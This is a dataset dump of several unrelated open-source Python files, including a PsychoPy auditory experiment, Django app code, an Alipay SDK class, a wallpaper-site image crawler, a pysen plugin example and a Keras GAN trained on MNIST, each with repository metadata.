text='Welcome!',
font='Comic Sans',
pos=(0, 0.7), height=0.1, wrapWidth=1.5, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=0.0);
main_geninstr = visual.TextStim(win=myWin, name='main_geninstr',
text=u'In this task you will hear a melody, consisting 6 tones, played on an electronic piano. After that, you will hear a sequence of two mixed melodies. Sometimes the melody which you heard first will be included but entangled with another melody. In the other cases the melody will not be inlcuded in the mixed sequence. \n\n\n\n',
font='Arial',
pos=(0, 0), height=0.065, wrapWidth=1.5, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=-1.0);
foot_geninstr = visual.TextStim(win=myWin, name='foot_geninstr',
text=u'Continue with the green button!',
font='Arial',
pos=(0, -0.9), height=0.04, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=-2.0);
head_geninstr.draw()
main_geninstr.draw()
foot_geninstr.draw()
myWin.flip()
if event.getKeys(keyList=["escape"]):
core.quit()
if green:
continueInstruction = False
green = False
continueInstruction = True
while continueInstruction:
main_geninstr_2 = visual.TextStim(win=myWin, name='main_geninstr_2',
text=u'After you have heard the melody and the mixed sequence, you should decide if the melody was included in the mixed sequence. Press the button on the right-hand side if the melody was included, on the left-hand side if not. Please try to be as fast as possible. Press the green button to continue with a short trial.',
font='Arial',
pos=(0, 0), height=0.075, wrapWidth=1.5, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=0.0);
foot_geninstr_2 = visual.TextStim(win=myWin, name='foot_geninstr_2',
text=u'Continue with the green button!',
font='Arial',
pos=(0, -0.9), height=0.04, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=-1.0);
main_geninstr_2.draw()
foot_geninstr_2.draw()
myWin.flip()
if event.getKeys(keyList=["escape"]):
core.quit()
if green:
continueInstruction = False
green = False
# Practice Block
trial = Trial(conditions, 0, 16)
trial.TrialBlock("practice")
msg = "You have answered %i stimuli correctly. \n (reaction time=%.2f s)" %(trial.correct , trial.meanTime)
continueInstruction = True
while continueInstruction:
head_feedback = visual.TextStim(win=myWin, name='head_feedback',
text=u'Trial finished!',
font='Arial',
pos=(0, 0.85), height=0.1, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=-1.0);
main_feedback = visual.TextStim(win=myWin, name='main_feedback',
text=msg,
font='Arial',
pos=(0, 0), height=0.075, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=-2.0);
foot_feedback = visual.TextStim(win=myWin, name='foot_feedback',
text=u'Continue with the green button!',
font='Arial',
pos=(0, -0.9), height=0.04, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=-3.0);
head_feedback.draw()
main_feedback.draw()
foot_feedback.draw()
myWin.flip()
if event.getKeys(keyList=["escape"]):
core.quit()
if green:
continueInstruction = False
green = False
continueInstruction = True
while continueInstruction:
head_begin = visual.TextStim(win=myWin, name='head_begin',
text='Start of the experiment',
font='Arial',
pos=(0, 0.75), height=0.1, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=0.0);
main_begin = visual.TextStim(win=myWin, name='main_begin',
text='First part. You are now well prepared for the experiment. If you have any questions, please ask the supervisor.',
font='Arial',
pos=(0, 0), height=0.1, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=-1.0);
foot_begin = visual.TextStim(win=myWin, name='foot_begin',
text=u'Continue with the green button!',
font='Arial',
pos=(0, -0.9), height=0.04, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=-3.0);
head_begin.draw()
main_begin.draw()
foot_begin.draw()
myWin.flip()
if event.getKeys(keyList=["escape"]):
core.quit()
if green:
continueInstruction = False
green = False
# First 8 trials
trial = Trial(conditions, 16, 80)
trial.TrialBlock(1)
continueInstruction = True
while continueInstruction:
main_begin_2 = visual.TextStim(win=myWin, name='main_begin_2',
text='Break!',
font='Arial',
pos=(0, 0), height=0.1, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=0.0);
foot_begin_2 = visual.TextStim(win=myWin, name='foot_begin_2',
text=u'Continue with the green button!',
font='Arial',
pos=(0, -0.9), height=0.04, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=-2.0);
main_begin_2.draw()
foot_begin_2.draw()
myWin.flip()
if event.getKeys(keyList=["escape"]):
core.quit()
if green:
continueInstruction = False
green = False
# Second 8 trials
trial = Trial(conditions, 80, 144)
trial.TrialBlock(2)
continueInstruction = True
while continueInstruction:
main_thanks = visual.TextStim(win=myWin, name='main_thanks',
text=u'Thank you for your participation. The supervisor will now continue to guide you through the session.',
font='Arial',
pos=(0, 0), height=0.1, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=0.0);
main_thanks.draw()
myWin.flip()
if event.getKeys(keyList=["escape"]):
core.quit()
if green:
continueInstruction = False
green = False
|
[
"teresa.wenhart@gmx.de"
] |
teresa.wenhart@gmx.de
|
d528cdacfede880f9f14ff74d6e95b3e9fe79d18
|
074f3ae0feba35fdf7e5e1b671780c4bb5d39d90
|
/students/models.py
|
85b8f6959f016110dae948326bfd703fef9840d7
|
[] |
no_license
|
aakhvostov/django_hw_8_testing
|
4a41589687db8ab64ffafe74085d72cdcd32722c
|
a8dec38a5f50b597943aed73c48c34df324b8b59
|
refs/heads/master
| 2023-04-03T02:21:47.539951
| 2021-03-23T09:27:15
| 2021-03-23T09:27:15
| 350,651,417
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 326
|
py
|
from django.db import models
class Student(models.Model):
name = models.TextField()
birth_date = models.DateField(
null=True,
)
class Course(models.Model):
name = models.TextField()
students = models.ManyToManyField(
Student,
blank=True,
related_name="course"
)
|
[
"skitol@yandex.ru"
] |
skitol@yandex.ru
|
6a4c42fa1139ad611c0cb192a9f35f255cbaeada
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/response/AlipayMarketingToolFengdieEditorGetResponse.py
|
400d69ff0b9e34578ec8dd0953f905e881f4d2fb
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 936
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.FengdieEditorGetRespModel import FengdieEditorGetRespModel
class AlipayMarketingToolFengdieEditorGetResponse(AlipayResponse):
def __init__(self):
super(AlipayMarketingToolFengdieEditorGetResponse, self).__init__()
self._data = None
@property
def data(self):
return self._data
@data.setter
def data(self, value):
if isinstance(value, FengdieEditorGetRespModel):
self._data = value
else:
self._data = FengdieEditorGetRespModel.from_alipay_dict(value)
def parse_response_content(self, response_content):
response = super(AlipayMarketingToolFengdieEditorGetResponse, self).parse_response_content(response_content)
if 'data' in response:
self.data = response['data']
|
[
"liuqun.lq@alibaba-inc.com"
] |
liuqun.lq@alibaba-inc.com
|
d393d84a2956744022939b557c3179418b5c3398
|
e02180b0000c9c0ed14e950c30429f405965371f
|
/NewAgeLiberty/wsgi.py
|
2a1b115e515e93c38d41bba2edbbef7443f24d46
|
[
"MIT"
] |
permissive
|
NAL0/Dja
|
cecb164fbf06babcde4bbe1ede11a89c760ad260
|
ed763d787a751fc6e63df6c6fd35f6ad28de0e08
|
refs/heads/master
| 2020-03-29T01:33:12.598304
| 2019-01-28T21:42:01
| 2019-01-28T21:42:01
| 149,394,476
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 403
|
py
|
"""
WSGI config for NewAgeLiberty project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "NewAgeLiberty.settings")
application = get_wsgi_application()
|
[
"nosocks94@gmail.com"
] |
nosocks94@gmail.com
|
c86e0865e0c26603c4194fb711017a9166f58fe9
|
cf5ceed90310006a4543d976882c85bc701efab3
|
/crawley/http/request.py
|
2ee8051481215e854868f1e700e2e775c4a43f2f
|
[] |
no_license
|
hammadk373/crawley
|
698b1aff51267a78f5e9f18d78f43e1dd69d75bd
|
f7522cfa0446b523b93e8056991f9d10e9754ff0
|
refs/heads/master
| 2021-01-18T06:52:07.753729
| 2011-10-28T02:37:00
| 2011-10-28T02:37:00
| 2,663,083
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,077
|
py
|
import time
import random
from eventlet.green import urllib2
from cookies import CookieHandler
from crawley.config import REQUEST_TIMEOUT, MOZILLA_USER_AGENT
class Request(object):
"""
Custom request object
"""
def __init__(self, url, cookie_handler=None):
if cookie_handler is None:
cookie_handler = CookieHandler()
self.url = url
self.headers = {}
self.headers["User-Agent"] = MOZILLA_USER_AGENT
self.headers["Accept-Charset"] = "ISO-8859-1,utf-8;q=0.7,*;q=0.3"
self.headers["Accept-Language"] = "es-419,es;q=0.8"
self.cookie_handler = cookie_handler
def get_response(self, data=None):
"""
Returns the response object from a request.
Cookies are supported via a CookieHandler object
"""
self._normalize_url()
request = urllib2.Request(self.url, data, self.headers)
opener = urllib2.build_opener(self.cookie_handler)
if REQUEST_TIMEOUT is not None:
response = opener.open(request, timeout=REQUEST_TIMEOUT)
else:
response = opener.open(request)
self.cookie_handler.save_cookies()
return response
def _normalize_url(self):
"""
Normalize the request url
"""
self.url = urllib2.quote(self.url.encode('utf-8'), safe="%/:=&?~#+!$,;'@()*[]")
class DelayedRequest(Request):
"""
A delayed custom Request
"""
def __init__(self, url, cookie_handler=None, delay=0, deviation=0):
self.delay = delay + random.randint(-deviation, deviation)
Request.__init__(self, url, cookie_handler)
def get_response(self, data=None):
"""
Waits [delay] miliseconds and then make the request
"""
mili_seconds = self.delay / 1000
time.sleep(mili_seconds)
return Request.get_response(self, data)
|
[
"jmg.utn@gmail.com"
] |
jmg.utn@gmail.com
|
ca4ff9f942bf417f6de624872efe568d0c0f4458
|
f469071d593df865e3c3b676655250d48b9b6b9e
|
/Search_engine/urls.py
|
03c696a505a37d0da73482b3af55e4a17f9c11bd
|
[] |
no_license
|
jayednahain/eComarce_django
|
af1ba704458a07290bbe4c291d71ce7c8c84edcf
|
8941349a5bdd9fdc55e3787b6adbdc31a4c57aab
|
refs/heads/main
| 2023-08-19T02:47:09.578771
| 2021-09-26T12:37:39
| 2021-09-26T12:37:39
| 391,820,014
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 182
|
py
|
from django.urls import path
from Search_engine import views
urlpatterns = [
#class based veiw
path('',views.CB_Search_ProductListview.as_view(),name='search_link'),
]
|
[
"jayednahian@yahoo.com"
] |
jayednahian@yahoo.com
|
769b940e5bcb345108cf45b4661ec78f939a45e2
|
467fdc6993ba8b1393faac58a804367465c016c9
|
/tests/common/test_model_utils.py
|
674fd32975dcb541ef7d60dbaed32b8050962619
|
[
"Apache-2.0"
] |
permissive
|
codeaudit/DeCLUTR
|
b8d8043a49cfecd20da93f66c07ff26652ff61f8
|
94d63e1b1978896c3446a7a4f85f6adfc454a088
|
refs/heads/master
| 2023-03-25T06:04:20.269495
| 2021-03-26T16:48:57
| 2021-03-26T16:48:57
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,583
|
py
|
from copy import deepcopy
import torch
from allennlp.data import TextFieldTensors
from hypothesis import given, settings
from hypothesis.strategies import integers
from declutr.common.model_utils import unpack_batch
class TestModelUtils:
@settings(deadline=None)
@given(
batch_size=integers(min_value=1, max_value=4),
num_anchors=integers(min_value=1, max_value=4),
max_length=integers(min_value=1, max_value=16),
)
def test_unpack_batch(self, batch_size: int, num_anchors: int, max_length: int) -> None:
# Create some dummy data.
two_dim_tensor = torch.randn(batch_size, max_length)
two_dim_input: TextFieldTensors = {
"tokens": {
"token_ids": two_dim_tensor,
"mask": torch.ones_like(two_dim_tensor),
"type_ids": torch.ones_like(two_dim_tensor),
}
}
three_dim_tensor = torch.randn(batch_size, num_anchors, max_length)
three_dim_input: TextFieldTensors = {
"tokens": {
"token_ids": three_dim_tensor,
"mask": torch.ones_like(three_dim_tensor),
"type_ids": torch.ones_like(three_dim_tensor),
}
}
four_dim_tensor = torch.randn(batch_size, num_anchors, num_anchors, max_length)
four_dim_input: TextFieldTensors = {
"tokens": {
"token_ids": four_dim_tensor,
"mask": torch.ones_like(four_dim_tensor),
"type_ids": torch.ones_like(four_dim_tensor),
}
}
# Only TextFieldTensors with tensors of three dimensions should be reshaped...
# Tensors are updated in-place, so deepcopy before passing to unpack_batch
actual_three_input_dim = unpack_batch(deepcopy(three_dim_input))
for name, tensor in actual_three_input_dim["tokens"].items():
assert torch.equal(
tensor,
three_dim_input["tokens"][name].reshape(batch_size * num_anchors, max_length),
)
# ...unpack_batch is a no-op for TextFieldTensors with tensors less than or greater than 3D.
actual_two_dim_input = unpack_batch(deepcopy(two_dim_input))
for name, tensor in actual_two_dim_input["tokens"].items():
assert torch.equal(tensor, two_dim_input["tokens"][name])
actual_four_dim_input = unpack_batch(deepcopy(four_dim_input))
for name, tensor in actual_four_dim_input["tokens"].items():
assert torch.equal(tensor, four_dim_input["tokens"][name])
|
[
"johnmgiorgi@gmail.com"
] |
johnmgiorgi@gmail.com
|
e957298594705e73339598471ace2f9e583a6de7
|
703deed0b0076c405e9f71dd6a9e8d38748d5233
|
/ex28format.py
|
0ae6b0b3c89ba352af0a00b11063987472f849fc
|
[] |
no_license
|
GuilhermeBeco/Python1
|
043d2075a6e3d76ae8e8215ce99ab79d8ce41a61
|
1a30bb75f4d8e4cbd22137b77296065cd4ea2f1d
|
refs/heads/master
| 2020-04-08T19:11:35.714415
| 2019-04-11T09:50:16
| 2019-04-11T09:50:16
| 159,644,312
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 207
|
py
|
def main():
vezes=int(input("Qual o numero que pretende fazer a tabuada: "))
for counter in range(1,10):
res=counter*vezes
print("{0:^4} * {0^:2} = {1:^4}".format(vezes,counter,res))
|
[
"guilhermebeco1999@gmail.com"
] |
guilhermebeco1999@gmail.com
|
729c18ab3486454879df76cfbfa6752853d1f752
|
da424570955152f345b0e6b2ba53ab237168a88c
|
/dl_animals.py
|
6d76b28929290092439b1342a35f4d9885a3a93f
|
[] |
no_license
|
Holographic-Sol/crawl_wallpapers_craft
|
5baf532e8f87306e50e50b2088eb02303552c116
|
da0abfd142bc9205106f3ec234e64e02b2eb5bc8
|
refs/heads/master
| 2022-01-16T09:13:31.153235
| 2019-07-24T13:57:50
| 2019-07-24T13:57:50
| 198,302,067
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,912
|
py
|
import os
import requests
from bs4 import BeautifulSoup
import distutils.dir_util
import urllib.request
chosen_res = '1920x1080.jpg'
download_location = '../crawler_bot_wallparscraft_download/animals/'
if os.path.exists(download_location):
print('download location:', download_location)
elif not os.path.exists(download_location):
distutils.dir_util.mkpath(download_location)
print('download location:', download_location)
catalog_url = []
catalog_href = []
catalog_page_num = []
compiled_page_link = []
def func_1(): # 1. obtain a list of catalog's.
url = 'https://wallpaperscraft.com/'
rHead = requests.get(url)
data = rHead.text
soup = BeautifulSoup(data, "html.parser")
for row in soup.find_all('a'):
href = row.get('href')
if href is None:
pass
elif '/catalog/' in href:
catalog_href.append(href)
catalog = 'https://wallpaperscraft.com' + href
catalog_url.append(catalog)
def func_2(): # 2. crawl each catalog for number of pages.
i = 0
page_num = ''
for catalog_urls in catalog_url:
rHead = requests.get(catalog_url[i])
data = rHead.text
soup = BeautifulSoup(data, "html.parser")
for row in soup.find_all('a'):
href = row.get('href')
if href is None:
pass
elif href.startswith('/catalog/') and 'page' in href:
page_num = href.replace(catalog_href[i], '')
page_num = page_num.replace('/page', '')
catalog_page_num.append(page_num)
i += 1
def func_3(): # 3. compile list of links available to crawl (predicated upon category and page numbers).
i = 0
page_num = 1
for catalog_urls in catalog_url:
catalog_page_num_int = int(catalog_page_num[i])
# print(catalog_url[i])
while page_num <= catalog_page_num_int:
page_num_str = str(page_num)
page_link = catalog_url[i] + '/page' + page_num_str
if page_link.startswith('https://wallpaperscraft.com/catalog/animals/'):
print(page_link)
compiled_page_link.append(page_link)
page_num += 1
i += 1
page_num = 1
def func_4():
i = 0
for compiled_page_links in compiled_page_link:
rHead = requests.get(compiled_page_link[i])
data = rHead.text
soup = BeautifulSoup(data, "html.parser")
for row in soup.find_all('a'):
href = row.get('href')
if href is None:
pass
elif href.startswith('/wallpaper/'):
image_link = 'https://wallpaperscraft.com' + href
rHead = requests.get(image_link)
data = rHead.text
soup = BeautifulSoup(data, "html.parser")
for row in soup.find_all('a'):
href = row.get('href')
if href is None:
pass
elif href.startswith('/download/'):
img_page = 'https://wallpaperscraft.com' + href
rHead = requests.get(img_page)
data = rHead.text
soup = BeautifulSoup(data, "html.parser")
images = soup.findAll('img')
for image in images:
img_url = image['src']
if chosen_res != '':
if img_url.endswith(chosen_res):
fname = img_url.replace('https://images.wallpaperscraft.com/image/', '')
path_fname = download_location + fname
if not os.path.exists(path_fname):
print('page', i, 'downloading:', img_url)
urllib.request.urlretrieve(img_url, path_fname)
elif os.path.exists(path_fname):
print('page', i, 'skipping:', img_url)
elif img_url.endswith('.jpg') and chosen_res is '':
fname = img_url.replace('https://images.wallpaperscraft.com/image/', '')
path_fname = download_location + fname
if not os.path.exists(path_fname):
print('page', i, 'downloading:', img_url)
urllib.request.urlretrieve(img_url, path_fname)
elif os.path.exists(path_fname):
print('page', i, 'skipping:', img_url)
i += 1
func_1()
func_2()
func_3()
func_4()
|
[
"noreply@github.com"
] |
Holographic-Sol.noreply@github.com
|
3ddefa654204ee814e07e0388f148ed0822a75c6
|
cef0d939d347ba997a8582c98d2e0ae5d869a41f
|
/bootleg/urls.py
|
330b1ba87c0cc30b6632a6b52ad10c1384d0e618
|
[] |
no_license
|
caodac/ncats_bootleg_access
|
5e2c629b4891d9f3ed81ee412ac6bfed064c4ac6
|
29391f2ac6886e5b9721693f6e95b6c116cd8e6e
|
refs/heads/master
| 2022-10-03T23:35:35.747774
| 2020-06-08T03:41:09
| 2020-06-08T03:41:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,500
|
py
|
from django.urls import path, reverse
from . import views
urlpatterns = [
path(r'', views.home, name='bootleg-home'),
# authentication views
path(r'signin', views.sign_in, name='bootleg-signin'),
path(r'signout', views.sign_out, name='bootleg-signout'),
path(r'callback', views.callback, name='bootleg-callback'),
path(r'auth', views.auth, name='bootleg-auth'),
path(r'verify', views.verify, name='bootleg-verify'),
path(r'login', views.bootleg_login, name='bootleg-login'),
# app content views
path(r'calendar', views.calendar, name='bootleg-calendar'),
path(r'messages/new', views.message_new, name='bootleg-message-new'),
path(r'messages/<id>', views.message, name='bootleg-message'),
path(r'messages/<id>/body', views.message_body,
name='bootleg-message-body'),
path(r'messages/<id>/<type>', views.message_send,
name='bootleg-message-send'),
path(r'messages', views.messages, name='bootleg-messages'),
# app content api
path(r'api/avatar', views.api_profile_photo, name='bootleg-api-avatar'),
path(r'api/messages/new', views.api_message_new,
name='bootleg-api-message-new'),
path(r'api/messages/<id>', views.api_message,
name='bootleg-api-message'),
path(r'api/messages/<id>/attachment/<attachment_id>',
views.api_message_attachment_content,
name='bootleg-api-message-attachment'),
path(r'api/people', views.api_people, name='bootleg-api-people'),
]
|
[
"caodac@gmail.com"
] |
caodac@gmail.com
|
7252cc8f913a94a2033b958de05b74e2e420e3c6
|
83ee2f4b88746ffd86479f54061cac56521cf7cc
|
/examples/plugin_example/plugin.py
|
38a784d6fbc8bb9e4a0c32121ec134d6317cf844
|
[
"MIT"
] |
permissive
|
r2en/pysen
|
0ae0231e3cf902585151ab0488845634bf2de7a4
|
be7666856cf99f07fc77c9d5fc0a9385498505e6
|
refs/heads/main
| 2023-03-29T10:22:36.408476
| 2021-04-03T00:53:59
| 2021-04-03T00:53:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,664
|
py
|
import dataclasses
import pathlib
import subprocess
from typing import DefaultDict, List, Sequence
import dacite
from pysen.command import CommandBase
from pysen.component import ComponentBase, RunOptions
from pysen.path import change_dir
from pysen.plugin import PluginBase
from pysen.pyproject_model import Config, PluginConfig
from pysen.reporter import Reporter
from pysen.runner_options import PathContext
from pysen.setting import SettingFile
class ShellCommand(CommandBase):
def __init__(self, name: str, base_dir: pathlib.Path, cmd: Sequence[str]) -> None:
self._name = name
self._base_dir = base_dir
self._cmd = cmd
@property
def name(self) -> str:
return self._name
def __call__(self, reporter: Reporter) -> int:
with change_dir(self._base_dir):
try:
ret = subprocess.run(self._cmd)
reporter.logger.info(f"{self._cmd} returns {ret.returncode}")
return ret.returncode
except BaseException as e:
reporter.logger.info(
f"an error occured while executing: {self._cmd}\n{e}"
)
return 255
class ShellComponent(ComponentBase):
def __init__(self, name: str, cmd: Sequence[str], targets: Sequence[str]) -> None:
self._name = name
self._cmd = cmd
self._targets = targets
@property
def name(self) -> str:
return self._name
def export_settings(
self, paths: PathContext, files: DefaultDict[str, SettingFile],
) -> None:
print(f"Called export_settings at {self._name}: do nothing")
@property
def targets(self) -> Sequence[str]:
return self._targets
def create_command(
self, target: str, paths: PathContext, options: RunOptions
) -> CommandBase:
assert target in self._targets
return ShellCommand(self._name, paths.base_dir, self._cmd)
@dataclasses.dataclass
class ShellPluginConfig:
name: str
command: List[str]
targets: List[str]
class ShellPlugin(PluginBase):
def load(
self, file_path: pathlib.Path, config_data: PluginConfig, root: Config
) -> Sequence[ComponentBase]:
assert (
config_data.config is not None
), f"{config_data.location}.config must be not None"
config = dacite.from_dict(
ShellPluginConfig, config_data.config, dacite.Config(strict=True)
)
return [ShellComponent(config.name, config.command, config.targets)]
# NOTE(igarashi): This is the entry point of a plugin method
def plugin() -> PluginBase:
return ShellPlugin()
|
[
"igarashi@preferred.jp"
] |
igarashi@preferred.jp
|
908c0b939a94bf22827f916a648c080ee523b568
|
8eea6dc3e55a28dd956c794a98a06d989966a5f2
|
/socialmedia/views.py
|
4e8406b5c4326358206320bf412e4e95d2cc3c40
|
[] |
no_license
|
m-sounak/Sociefy
|
c4440e5811345ba2164ba0bd67f4d9fef8d9e26c
|
ebb08a9add286145ee050aac339fb137914ad97e
|
refs/heads/master
| 2023-02-18T00:40:50.648913
| 2021-01-19T10:30:08
| 2021-01-19T10:30:08
| 330,941,758
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 230
|
py
|
from django.views.generic import TemplateView
class TestPage(TemplateView):
template_name = 'test.html'
class ThanksPage(TemplateView):
template_name = 'thanks.html'
class HomePage(TemplateView):
    # Site landing page rendered from index.html.
    template_name = 'index.html'
|
[
"sounakmajumder472@gmail.com"
] |
sounakmajumder472@gmail.com
|
e57f5fe36e1e98cfe8da5db57b7a967875c6d373
|
90b0b959da8adee5825efa12b212e5e76ba4837f
|
/GAN/GAN.py
|
8565d8b1655ff4e6eaf2926468df5ba3d6e1482c
|
[] |
no_license
|
madhureelatha/GAN-vs-VAE-Performance-Analysis
|
6ec1e95ee29cf1b5d5786cadb01ae17986087fbc
|
47909dff0688838ed7f9e24b11997e62f09c3ca2
|
refs/heads/master
| 2023-01-23T21:39:00.717079
| 2020-12-13T04:51:46
| 2020-12-13T04:51:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,591
|
py
|
# -*- coding: utf-8 -*-
"""Allam.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1DYWUkFxQyrRpphg8a-zlnVlPV43nAn1U
"""
import pydot
from keras.datasets import mnist
from keras.layers import Input, Dense, Reshape, Flatten, Dropout
from keras.layers import BatchNormalization, Activation, ZeroPadding2D
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.convolutional import UpSampling2D, Conv2D, Conv2DTranspose
from keras.models import Sequential, Model
from keras.optimizers import Adam
from keras.utils.vis_utils import plot_model
import matplotlib.pyplot as plt
import sys
import os
import numpy as np
# MNIST image geometry: 28x28 single-channel (grayscale) images.
img_rows = 28
img_cols = 28
channels = 1
img_shape = (img_rows, img_cols, channels)
# Length of the random noise vector fed to the generator.
latent_dim = 100
# Adam optimizer shared by both models (standard DCGAN hyperparameters).
optimizer = Adam(learning_rate=0.0002, beta_1=0.5)
def build_generator():
    """Build the generator: maps a latent noise vector to a 28x28x1 image.

    Architecture: three fully-connected blocks (256 -> 512 -> 1024), each
    followed by LeakyReLU and batch normalization, then a tanh output layer
    reshaped to ``img_shape``. tanh matches training data scaled to [-1, 1].

    Returns:
        keras Model mapping a (latent_dim,) noise vector to an image.
    """
    # Cleanup: the original contained several commented-out convolutional
    # layers (dead code); they have been removed for readability.
    model = Sequential(name='generator')

    model.add(Dense(256, input_dim=latent_dim))
    model.add(LeakyReLU(alpha=0.2))
    model.add(BatchNormalization(momentum=0.8))

    model.add(Dense(512))
    model.add(LeakyReLU(alpha=0.2))
    model.add(BatchNormalization(momentum=0.8))

    model.add(Dense(1024))
    model.add(LeakyReLU(alpha=0.2))
    model.add(BatchNormalization(momentum=0.8))

    # tanh keeps outputs in [-1, 1]; training data is rescaled to that range.
    model.add(Dense(np.prod(img_shape), activation='tanh'))
    model.add(Reshape(img_shape))
    model.summary()

    noise = Input(shape=(latent_dim,))
    img = model(noise)
    return Model(noise, img)
def build_discriminator():
    """Build the discriminator: classifies 28x28x1 images as real or fake.

    Architecture: flatten the image, then two fully-connected blocks
    (512 -> 256) with LeakyReLU, ending in a single sigmoid unit that
    outputs the probability that the input image is real.

    Returns:
        keras Model mapping an ``img_shape`` image to a scalar in (0, 1).
    """
    model = Sequential(name='discriminator')
    model.add(Flatten(input_shape=img_shape))
    model.add(Dense(512))
    model.add(LeakyReLU(alpha=0.2))
    model.add(Dense(256))
    model.add(LeakyReLU(alpha=0.2))
    # FIX: the original added a second Flatten() here. The tensor is already
    # rank-2 after the Dense layers, so that layer was a no-op and has been
    # removed; the computation is unchanged. Dead commented-out Conv2D
    # layers were removed as well.
    model.add(Dense(1, activation='sigmoid'))
    model.summary()

    img = Input(shape=img_shape)
    validity = model(img)
    return Model(img, validity)
def train(epochs, t_data, batch_size=64, sample_interval=50):
    """Run the adversarial training loop.

    Args:
        epochs: number of iterations (one real + one fake batch per epoch).
        t_data: raw uint8 images, shape (N, 28, 28); rescaled internally.
        batch_size: images per discriminator/generator update.
        sample_interval: save a grid of generated samples every N epochs.

    Returns:
        List of generator losses, one per epoch.
    """
    res_g_loss = []
    # Rescale [0, 255] pixels to [-1, 1] to match the generator's tanh output.
    t_data = t_data / 127.5 - 1.
    # Add the trailing channel axis: (N, 28, 28) -> (N, 28, 28, 1).
    t_data = np.expand_dims(t_data, axis=3)
    # Target labels: 1 = real, 0 = fake.
    valid = np.ones((batch_size, 1))
    fake = np.zeros((batch_size, 1))
    for epoch in range(epochs):
        # --- Discriminator step: one real batch, one generated batch.
        idx = np.random.randint(0, t_data.shape[0], batch_size)
        imgs = t_data[idx]
        noise = np.random.normal(0, 1, (batch_size, latent_dim))
        gen_imgs = generator.predict(noise)
        d_loss_real = discriminator.train_on_batch(imgs, valid)
        d_loss_fake = discriminator.train_on_batch(gen_imgs, fake)
        d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)
        # --- Generator step: train via the combined model (discriminator
        # frozen there), labeling generated images as "valid" to fool it.
        noise = np.random.normal(0, 1, (batch_size, latent_dim))
        g_loss = combined.train_on_batch(noise, valid)
        res_g_loss.append(g_loss)
        print("%d [d_loss_real: %.4f, d_loss_fake: %.4f] [g_loss: %.4f]" % (epoch, d_loss[0], d_loss[1], g_loss))
        if epoch % sample_interval == 0:
            sample_images(epoch)
    return res_g_loss
def sample_images(epoch):
    """Generate a 5x5 grid of sample images and save it to images/<epoch>.png."""
    r, c = 5, 5
    noise = np.random.normal(0, 1, (r * c, latent_dim))
    gen_imgs = generator.predict(noise)
    # Rescale from the tanh output range [-1, 1] back to [0, 1] for display.
    gen_imgs = 0.5 * gen_imgs + 0.5
    fig, axs = plt.subplots(r, c)
    cnt = 0
    for i in range(r):
        for j in range(c):
            axs[i, j].imshow(gen_imgs[cnt, :, :, 0], cmap='gray')
            axs[i, j].axis('off')
            cnt += 1
    fig.savefig("images/%d.png" % epoch)
    plt.close()
# --- Assemble the GAN: a trainable discriminator, plus a combined model in
# which the discriminator is frozen so only the generator receives updates.
discriminator = build_discriminator()
discriminator.compile(loss='binary_crossentropy', optimizer=optimizer, metrics=['accuracy'])

generator = build_generator()

gan_input = Input(shape=(latent_dim,))
img = generator(gan_input)
# Freeze discriminator weights inside the combined (generator-training) model.
discriminator.trainable = False
validity = discriminator(img)
combined = Model(gan_input, validity)
combined.compile(loss='binary_crossentropy', optimizer=optimizer)

if not os.path.exists("./images"):
    os.makedirs("./images")

# Train on the full MNIST dataset (train and test splits concatenated).
(X_train, Y_train), (X_test, Y_test) = mnist.load_data()
X_total = np.concatenate((X_train, X_test), axis=0)

# BUG FIX: the original called `gan = GAN()` here, but no GAN class exists
# anywhere in this script, so the program crashed with NameError before
# training started. The call has been removed; the models above are used
# directly by train().
g_loss = train(epochs=10000, batch_size=200, sample_interval=100, t_data=X_total)
print(np.mean(g_loss))

plt.figure()
plt.plot(g_loss)
plt.xlabel("epochs")
plt.ylabel("g_loss")
